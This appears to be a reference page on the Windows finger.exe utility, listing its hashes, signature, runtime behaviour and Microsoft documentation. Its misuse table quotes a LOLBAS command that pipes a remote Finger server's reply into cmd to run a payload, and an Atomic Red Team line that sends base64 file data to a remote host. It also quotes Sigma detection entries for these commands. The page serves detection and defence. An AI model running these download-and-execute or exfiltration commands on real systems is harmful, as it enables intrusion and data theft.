finger.exe
- File Path:
C:\WINDOWS\SysWOW64\finger.exe - Description: TCPIP Finger Command
Hashes
| Type | Hash |
|---|---|
| MD5 | FE8AED0BFCFFCBC51D1FDCBCEB812F0D |
| SHA1 | FEDF8DA52E6A08D0646FA10219945CFC22A1896B |
| SHA256 | 4C2179ECF2793C6FDC5AE913B3D2CFB73DF681CFCDD10971E279153BBBB05AB0 |
| SHA384 | 44874DECFA875B607FB94707D092F5AF4FCD1843DEAF473A5A548D7A8FE0299B2E14062F86C0CFBC9275436BB3F1497A |
| SHA512 | ACCFF977CA87498B3EFBBD1D194D253A3A1721F407E983769AC6B87FA52861EC10226E9E8450982C2B65ABDA8C24C79BCBF1A52D22905EC96C2A1BA46E7F334A |
| SSDEEP | 192:T7LKfzk7U2DoBumgxkqYTDgjdpeOXbgFwAE8Lj/QWG0Wf6Sem:/GfkbDoAmgxkcj2O8iSL8WG0Wm |
| IMP | 358D15891D3205ED994A81D9C95EBABB |
| PESHA1 | 984B5E6F677A8FF7946DF9E8BAD2B9569B53F295 |
| PE256 | 50060251D1B96E36FFC6C5A58C1EDBEABE3F421F9DDB26C53D6677C3F799F37F |
Runtime Data
Usage (stdout):
[default-pc]
Usage (stderr):
Displays information about a user on a specified system running the
Finger service. Output varies based on the remote system.
FINGER [-l] [user]@host [...]
-l Displays information in long list format.
user Specifies the user you want information about. Omit the user
parameter to display information about all users on the
specifed host.
@host Specifies the server on the remote system whose users you
want information about.
Child Processes:
conhost.exe
Open Handles:
| Path | Type |
|---|---|
| (R-D) C:\Windows\System32\en-US\finger.exe.mui | File |
| (RW-) C:\Windows | File |
| (RW-) C:\Windows\SysWOW64 | File |
| \BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db | Section |
| \BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db | Section |
| \BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2.ro | Section |
| \Sessions\2\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 | Section |
| \Sessions\2\BaseNamedObjects\NLS_CodePage_437_3_2_0_0 | Section |
Loaded Modules:
| Path |
|---|
| C:\WINDOWS\SYSTEM32\ntdll.dll |
| C:\WINDOWS\System32\wow64.dll |
| C:\WINDOWS\System32\wow64base.dll |
| C:\WINDOWS\System32\wow64con.dll |
| C:\WINDOWS\System32\wow64cpu.dll |
| C:\WINDOWS\System32\wow64win.dll |
| C:\WINDOWS\SysWOW64\finger.exe |
Signature
- Status: Signature verified.
- Serial:
33000002ED2C45E4C145CF48440000000002ED - Thumbprint:
312860D2047EB81F8F58C29FF19ECDB4C634CF6A - Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
- Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
File Metadata
- Original Filename: finger.exe
- Product Name: Microsoft Windows Operating System
- Company Name: Microsoft Corporation
- File Version: 10.0.22000.1 (WinBuild.160101.0800)
- Product Version: 10.0.22000.1
- Language: English (United States)
- Legal Copyright: Microsoft Corporation. All rights reserved.
- Machine Type: 32-bit
File Scan
- VirusTotal Detections: 0/73
- VirusTotal Link: https://www.virustotal.com/gui/file/4c2179ecf2793c6fdc5ae913b3d2cfb73df681cfcdd10971e279153bbbb05ab0/detection
Possible Misuse
The following table contains possible examples of finger.exe being misused. While finger.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
| Source | Source File | Example | License |
|---|---|---|---|
| sigma | proc_creation_win_susp_finger_usage.yml | title: Finger.exe Suspicious Invocation |
DRL 1.0 |
| sigma | proc_creation_win_susp_finger_usage.yml | description: Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays |
DRL 1.0 |
| sigma | proc_creation_win_susp_finger_usage.yml | Image\|endswith: '\finger.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_finger_usage.yml | - Admin activity (unclear what they do nowadays with finger.exe) |
DRL 1.0 |
| LOLBAS | Finger.yml | Name: Finger.exe |
|
| LOLBAS | Finger.yml | Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon |
|
| LOLBAS | Finger.yml | - Command: finger user@example.host.com \| more +2 \| cmd |
|
| LOLBAS | Finger.yml | Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.' |
|
| LOLBAS | Finger.yml | - Path: c:\windows\system32\finger.exe |
|
| LOLBAS | Finger.yml | - Path: c:\windows\syswow64\finger.exe |
|
| LOLBAS | Finger.yml | - IOC: finger.exe should not be run on a normal workstation. |
|
| LOLBAS | Finger.yml | - IOC: finger.exe connecting to external resources. |
|
| malware-ioc | nouns.txt | finger |
© ESET 2014-2018 |
| atomic-red-team | index.md | - Atomic Test #16: File download with finger.exe on Windows [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #16: File download with finger.exe on Windows [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | T1105.md | - Atomic Test #16 - File download with finger.exe on Windows | MIT License. © 2018 Red Canary |
| atomic-red-team | T1105.md | ## Atomic Test #16 - File download with finger.exe on Windows | MIT License. © 2018 Red Canary |
| atomic-red-team | T1105.md | Simulate a file download using finger.exe. Connect to localhost by default, use custom input argument to test finger connecting to an external server. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1105.md | https://www.bleepingcomputer.com/news/security/windows-10-finger-command-can-be-abused-to-download-or-steal-files/ | MIT License. © 2018 Red Canary |
| atomic-red-team | T1105.md | finger base64_filedata@#{remote_host} | MIT License. © 2018 Red Canary |
Additional Info*
*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.
finger
Applies to: Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012
Displays information about users on a specified remote computer (typically a computer running UNIX) that is running the finger service or daemon. The remote computer specifies the format and output of the user information display. Used without parameters, finger displays help.
[!IMPORTANT] This command is available only if the Internet Protocol (TCP/IP) protocol is installed as a component in the properties of a network adapter in Network Connections.
Syntax
finger [-l] [<user>] [@<host>] [...]
Parameters
| Parameter | Description |
|---|---|
| -l | Displays user information in long list format. |
<user> |
Specifies the user about which you want information. If you omit the user parameter, this command displays information about all users on the specified computer. |
@<host> |
Specifies the remote computer running the finger service where you are looking for user information. You can specify a computer name or IP address. |
| /? | Displays help at the command prompt. |
Remarks
-
You must prefix finger parameters with a hyphen (-) rather than a slash (/).
-
Multiple
user@hostparameters can be specified.
Examples
To display information for user1 on the computer users.microsoft.com, type:
finger user1@users.microsoft.com
To display information for all users on the computer users.microsoft.com, type:
finger @users.microsoft.com
Additional References
MIT License. Copyright (c) 2020-2021 Strontic.